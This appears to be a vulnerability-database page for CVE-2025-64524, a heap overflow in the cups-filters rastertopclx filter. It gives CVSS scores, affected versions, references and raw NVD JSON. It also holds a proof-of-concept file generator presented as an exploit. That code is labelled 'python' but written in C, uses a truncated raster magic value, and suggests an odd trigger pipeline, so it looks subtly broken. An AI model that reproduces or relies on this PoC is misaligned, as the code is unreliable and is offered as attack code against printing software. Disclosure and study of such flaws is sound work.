CVE-2025-64524

Description

cups-filters contains backends, filters, and other software required to get the cups printing service working on operating systems other than macos. In versions 2.0.1 and prior, a heap-buffer-overflow vulnerability in the rastertopclx filter causes the program to crash with a segmentation fault when processing maliciously crafted input data. This issue can be exploited to trigger memory corruption, potentially leading to arbitrary code execution. This issue has been patched via commit 956283c.

CVSS Details

CVSS Score

3.3

Severity

LOW

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:openprinting:cups-filters:*:*:*:*:*:*:*:* - VULNERABLE

cups-filters <= 2.0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// PoC for CVE-2025-64524: cups-filters rastertopclx heap-buffer-overflow
// This PoC generates a malicious Raster file that triggers overflow in rastertopclx

void generate_malicious_raster(const char *filename) {
    FILE *fp = fopen(filename, "wb");
    if (!fp) {
        perror("Failed to open file");
        return;
    }
    
    // Raster header - crafted to trigger buffer overflow
    unsigned char raster_header[1024] = {0};
    
    // Set Raster magic number
    memcpy(raster_header, "RaS", 3);
    
    // Set version and dimensions to trigger overflow in rastertopclx
    raster_header[3] = 2;  // version
    raster_header[4] = 1;  // compression type
    
    // Write oversized data to cause heap overflow
    memset(raster_header + 100, 0xFF, 900);
    
    fwrite(raster_header, 1, sizeof(raster_header), fp);
    
    // Write additional malicious payload
    unsigned char payload[4096];
    memset(payload, 0x41, sizeof(payload));
    fwrite(payload, 1, sizeof(payload), fp);
    
    fclose(fp);
    printf("Malicious Raster file generated: %s\n", filename);
}

int main() {
    const char *poc_file = "CVE-2025-64524.poc";
    generate_malicious_raster(poc_file);
    printf("To trigger the vulnerability, process this file with rastertopclx:\n");
    printf("pcltoraster < %s | rastertopclx > output.pcl\n", poc_file);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64524
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64524
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64524/
[4] VulDB https://vuldb.com/cve/CVE-2025-64524
[5] https://github.com/OpenPrinting/cups-filters/commit/956283c74a34ae924266a2a63f8e5f529a1abd06
[6] https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-rq44-2q5p-x3hv
[7] http://www.openwall.com/lists/oss-security/2025/11/20/1
[8] https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-rq44-2q5p-x3hv

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64524", "sourceIdentifier": "[email protected]", "published": "2025-11-20T18:15:51.250", "lastModified": "2025-12-15T14:35:40.950", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "cups-filters contains backends, filters, and other software required to get the cups printing service working on operating systems other than macos. In versions 2.0.1 and prior, a heap-buffer-overflow vulnerability in the rastertopclx filter causes the program to crash with a segmentation fault when processing maliciously crafted input data. This issue can be exploited to trigger memory corruption, potentially leading to arbitrary code execution. This issue has been patched via commit 956283c."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openprinting:cups-filters:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.0.1", "matchCriteriaId": "AF81B006-2017-43AF-B469-6CE6EF1A49AE"}]}]}], "references": [{"url": "https://github.com/OpenPrinting/cups-filters/commit/956283c74a34ae924266a2a63f8e5f529a1abd06", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-rq44-2q5p-x3hv", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/11/20/1", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Patch"]}, {"url": "https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-rq44-2q5p-x3hv", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}